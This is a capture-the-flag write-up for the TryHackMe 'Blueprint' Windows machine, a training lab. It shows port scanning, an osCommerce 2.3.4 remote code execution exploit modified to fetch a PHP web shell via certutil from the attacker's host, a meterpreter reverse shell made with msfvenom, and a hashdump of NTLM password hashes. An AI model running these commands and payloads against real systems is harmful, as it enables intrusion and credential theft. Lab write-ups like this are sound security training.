THM Writeup – Blueprint
![THM Writeup - Blueprint](https://cdn.titus74.com/wp-content/uploads/2022/04/03133905/0ee34224ad2747f09b0f08610a9abb89-65px.png)
Hack into this Windows machine and escalate your privileges to Administrator.
![](https://cdn.titus74.com/wp-content/uploads/2022/04/03134207/998045a4ba944f6c91a548a899383b87-1024x855.png)
Do you have what is takes to hack into this Windows Machine?
Add IP address to your hosts
file:
echo '10.10.32.200 blueprint.thm' >> /etc/hosts
Scan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv blueprint.thm
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 128
135/tcp open msrpc syn-ack ttl 128
139/tcp open netbios-ssn syn-ack ttl 128
443/tcp open https syn-ack ttl 128
445/tcp open microsoft-ds syn-ack ttl 128
3306/tcp open mysql syn-ack ttl 128
8080/tcp open http-proxy syn-ack ttl 128
49152/tcp open unknown syn-ack ttl 128
49153/tcp open unknown syn-ack ttl 128
49154/tcp open unknown syn-ack ttl 128
49158/tcp open unknown syn-ack ttl 128
49159/tcp open unknown syn-ack ttl 128
49160/tcp open unknown syn-ack ttl 128
Get more details about open ports:
nmap -T4 -A -p 80,135,139,443,445,3306,8080,49152-49154,49158-49160 blueprint.thm
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Check web application on port 80, browse to http://blueprint.thm
![server error](https://cdn.titus74.com/wp-content/uploads/2022/04/03134507/e8a994be0fe744c3815e4e6752f36286.png)
Same as nmap found, of course 🙂
Check web application on port 443, browse to https://blueprint.thm
![blueprint app on port 443](https://cdn.titus74.com/wp-content/uploads/2022/04/03134602/96884416f9b04d9c96f7a4861dbedb31.png)
Explore the oscommerce folder:
![oscommerce directory](https://cdn.titus74.com/wp-content/uploads/2022/04/03134651/b8a76c754744414e955ff3654f4f7534.png)
When we click on the catalog
directory, there is some web site:
![eshop web app](https://cdn.titus74.com/wp-content/uploads/2022/04/03134743/b53c1dcb93104161846bbdfb1768893e-1024x470.png)
It’s probably Oscommerce’s web site
When we click on the docs
directory, there is detailed Oscommerce’s documentation:
![oscommerce docs directory](https://cdn.titus74.com/wp-content/uploads/2022/04/03134848/18feb8a68db743f6bb118f3b444063cc.png)
Now let’s check port 8080, browse to http://blueprint.thm:8080
![blueprint web app on port 8080](https://cdn.titus74.com/wp-content/uploads/2022/04/03134939/1b694065d1ca4f038c6139715d402972.png)
It looks like the same as on port 443 – when we check it, we’ll find out that it is exactly the same.
As we have Oscommerce 2.3.4 running on http://blueprint.thm:8080/oscommerce-2.3.4/catalog/, let’s check if there is an exploit for this product:
root@ip-10-10-211-38:~# searchsploit oscommerce 2.3.4
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Inject | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injecti | php/webapps/46330.txt
osCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py
---------------------------------------------- ---------------------------------
We’re going to use Remote Code Execution, file 44374.py
Locate the exploit and copy it to the current directory:
root@ip-10-10-240-99:~# locate php/webapps/44374.py
/opt/searchsploit/exploits/php/webapps/44374.py
root@ip-10-10-240-99:~# cp /opt/searchsploit/exploits/php/webapps/44374.py .
We need to modify the script – change base_url
and target_url
so it’s the same where Oscommerce is running in our case, and also add your PHP payload:
# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://blueprint.thm:8080/oscommerce-2.3.4/catalog/"
target_url = "http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"
data = {
'DIR_FS_DOCUMENT_ROOT': './'
}
# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.10.240.99:8000/shell.php shell.php");'
payload += 'echo $var;'
payload += '/*'
data['DB_DATABASE'] = payload
# exploit it
r = requests.post(url=target_url, data=data)
if r.status_code == 200:
print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.$
else:
print("[-] Exploit did not execute as planned")
Create a .php
file to add cmd
query parameter to the application, so we can issue commands to the OS and then run python3 web server:
root@ip-10-10-211-38:~# echo '<?php echo system($_GET["cmd"]); ?>' > shell.php
root@ip-10-10-240-99:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Run the exploit:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Click on the url provided by the exploit and wait for the execution.
Now browse to http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami
![shell php](https://cdn.titus74.com/wp-content/uploads/2022/04/03135352/716663cbcb124e74a2f83c8574140d5d-1024x104.png)
Ehm, there is a filter. Nvm, we’ll try to bypass it – overwrite shell.php
:
root@ip-10-10-240-99:~# echo '<?php echo shell_exec($_GET["cmd"]); ?>' > shell.php
Run the exploit again:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Visit the link again:
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Now browse to http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami
![shell php whoami](https://cdn.titus74.com/wp-content/uploads/2022/04/03135855/cf3da9a5fdd3410a90ad239211ebdaec.png)
Great, this works and we are privileged nt authority\system
user, so let’s upload a reverse shell.
Generate a reverse shell using msfvenom
:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.240.99 LPORT=4242 -f exe > shell.exe
Run python http server again:
root@ip-10-10-240-99:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Modify the payload in your exploit script:
![payload](https://cdn.titus74.com/wp-content/uploads/2022/04/03140035/ae0b4761145947e893b23db46bc31cd1-1024x70.png)
Run metasploit and get multi/handler
ready:
root@ip-10-10-240-99:~# msfconsole
msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.240.99
LHOST => 10.10.240.99
msf5 exploit(multi/handler) > set LPORT 4242
LPORT => 4242
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.240.99:4242
Run the exploit again:
root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code
http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php
Visit configure.php
and wait for the execution:
![multi handler](https://cdn.titus74.com/wp-content/uploads/2022/04/03140228/5cf7c37b2c0d40ec9baab68901867aa0.png)
Now we have a shell on the target machine.
Let’s dump the hashes:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
meterpreter >
To crack the hash use for example https://crackstation.net/
![crackstation](https://cdn.titus74.com/wp-content/uploads/2022/04/03140628/f33ea340eea641f5a006a828c31983d6-1024x429.png)
Now you can answer the first question:
“Lab” user NTML hash decrypted
The root flag should be on the Administrator’s desktop:
meterpreter > cd C:/Users/Administrator/Desktop
meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-04-11 23:36:47 +0100 desktop.ini
100666/rw-rw-rw- 37 fil 2019-04-11 23:40:59 +0100 root.txt.txt
meterpreter > cat root.txt.txt
THM{[REDACTED]}
Do you like this writeup? Check out other THM Writeups.